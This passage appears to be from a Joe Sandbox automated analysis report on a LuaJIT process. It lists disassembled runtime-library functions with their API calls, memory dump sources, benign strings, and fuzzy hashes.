                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                      • Instruction ID: 2c1dfb2f573b339693ab349da79886877b548799df241e3f6f176b9c765a27a7
                                                      • Opcode Fuzzy Hash: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                      • Instruction Fuzzy Hash: 52F05461F2974282EB446B58D484374A360EFA578FFC81035E65F4556CCFACD448C320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBCDE4 Relevance: 7.7, APIs: 5, Instructions: 202COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B1EBCE26
                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7B1EBCDA3,?,?,FFFFFFFE,00007FF7B1EBD196), ref: 00007FF7B1EBCEE4
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7B1EBCDA3,?,?,FFFFFFFE,00007FF7B1EBD196), ref: 00007FF7B1EBCF6E
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2210144848-0
                                                      • Opcode ID: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                      • Instruction ID: 7b06fc315b377b1d73bb8186002e23726c6bb5fbd8e40c5e8de7996e329d3ba2
                                                      • Opcode Fuzzy Hash: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                      • Instruction Fuzzy Hash: 73819722A1864285F710FB6984802BDA7A1BF6679EFC44235FF0E53699DFBCA441C330
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBFCD8 Relevance: 7.7, APIs: 5, Instructions: 158COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                      • Instruction ID: 087d32ee3ffdcb1ae43dde55b08f30701d05307a236053eb5409545bc6335d66
                                                      • Opcode Fuzzy Hash: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                      • Instruction Fuzzy Hash: 4551F32290898685E762EF3CA89037BD210BF6375EF948335FB5D1E5D8DFBCA4818610
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBF880 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                      • Instruction ID: 3206ea8d958ae5cf784d26395f5baf5b1a5d9b556431ad832c6dc5a253a3cafb
                                                      • Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                      • Instruction Fuzzy Hash: E3117C26E18A2701F754B37CA4D237BD0406F6636AF980332F76E4E2DEDE9C68408220
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E28A50 Relevance: 7.5, APIs: 5, Instructions: 31libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID:
                                                      • API String ID: 667068680-0
                                                      • Opcode ID: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                      • Instruction ID: 8171558b05e84f1e87fc23ba691182d2ce67007e2fa37e5a5ed69e4034b8b217
                                                      • Opcode Fuzzy Hash: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                      • Instruction Fuzzy Hash: 7B01ED7260CA81C1D764AB18F86432AA7B0FB997DAF544135EBCD4266CCF7CD554CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBD7F8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                      • API String ID: 3215553584-1196891531
                                                      • Opcode ID: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                      • Instruction ID: 10579e44a05b6d5e0737ba74a2068988d01c911da3f0766d9aeac3d089fa2476
                                                      • Opcode Fuzzy Hash: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                      • Instruction Fuzzy Hash: 1581A232D0C24285F765EB2C81C427AEB91BB37B4EFD85235E70DC619DCAEDA8019761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E95C3C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                      • Instruction ID: e48ae6c3961f9094dbcd2ffa11ed4bcb68edfc285386a0695f7077d063676015
                                                      • Opcode Fuzzy Hash: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                      • Instruction Fuzzy Hash: 0581747290C34686E764AF2D804807DB7A0EF27B8EF948037DB494629DDFBAE441C725
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E963E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                      • Instruction ID: 4609d760524dc6aaaee14835305501502f77bc37eb165375970076ca6ea97505
                                                      • Opcode Fuzzy Hash: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                      • Instruction Fuzzy Hash: 7381847280824286EB64BF2D804507DB7A4EB2ABCEFD44037CB494629DDFB9E445C775
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E94E50 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                      • Instruction ID: 76c7353a583c17c7d12bae857c02163b55ee6b136670e9fa5fbffe4b6060de9c
                                                      • Opcode Fuzzy Hash: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                      • Instruction Fuzzy Hash: 5E81527280C24286EB64AF2D815817CB794EF27B8EF940136DB494729DCFB9E485CB71
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E9551C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                      • Instruction ID: bb9360a8c5705f750049efc34b0c3ba56cd639361be02edee4d0dc1553278a99
                                                      • Opcode Fuzzy Hash: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                      • Instruction Fuzzy Hash: 8981327280C246C6EB64AF2D904817CBBA1EF27B8DF940137CB494629DCFB9E585C721
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAF800 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: "$sinh
                                                      • API String ID: 1156100317-1232919748
                                                      • Opcode ID: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                      • Instruction ID: 6c642c7a2c702878122d1f8bc01cd5d1b52eceae391eeea52f4c5d18e0687f74
                                                      • Opcode Fuzzy Hash: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                      • Instruction Fuzzy Hash: B291A721928F8188D3639B3894513B6F354AF773DAF558327EA8F35A59DF6C90438710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E9061C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3544855599-2084237596
                                                      • Opcode ID: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                      • Instruction ID: 4ba7a50818a32d243704d84e62c4c71439b0f43d441421411701dbe15b9109db
                                                      • Opcode Fuzzy Hash: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                      • Instruction Fuzzy Hash: C2619C32A04B85CAE720AF69D8403ADB7A4FB55B8DF944225EF4D17B99CFB8E050C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E8EF34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Unwind__except_validate_context_record
                                                      • String ID: csm$f
                                                      • API String ID: 2208346422-629598281
                                                      • Opcode ID: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                      • Instruction ID: 87a1f9f6f4d0c6745ebda1be28cf88be01caa019282c9db26d29aa0db9e8db86
                                                      • Opcode Fuzzy Hash: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                      • Instruction Fuzzy Hash: A051CC31B095828ADB14EB19D408629B795FB66B8DF908130DF0E4BB4CDFB9E942C710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAF344 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: !$acos
                                                      • API String ID: 1156100317-2870037509
                                                      • Opcode ID: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                      • Instruction ID: 2e7c70b484efafb6fe7a401a1a9b01e291da43c940e2a7b68053f96ae66333a9
                                                      • Opcode Fuzzy Hash: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                      • Instruction Fuzzy Hash: 3961E721D2CF4589E723EF38581027AD754AFB739AF558332EA5E3596CDF6CE0828610
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAF0B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: !$asin
                                                      • API String ID: 1156100317-2188059690
                                                      • Opcode ID: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                      • Instruction ID: a647d487e99cbaba2ed1689b435d88d42af18a6f232d25d54c0c1849da075015
                                                      • Opcode Fuzzy Hash: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                      • Instruction Fuzzy Hash: DC51C921D28F4589E7139F38981027AD354AFB738AF958336EA5E3596CDF6CA0828710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E28C80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock
                                                      • String ID: luaJIT_BC_%s$luaopen_%s$path too long
                                                      • API String ID: 2882679554-1241789697
                                                      • Opcode ID: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                      • Instruction ID: 5316010c2b0332d1776382b4313e1815caa60c5f4dece4c0570a238580acf7f4
                                                      • Opcode Fuzzy Hash: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                      • Instruction Fuzzy Hash: 5E51433251CA4581EB50AB19E45076AA7A1F7A57D9FA00136FB8D43BADCFBCD440CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC19F0 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
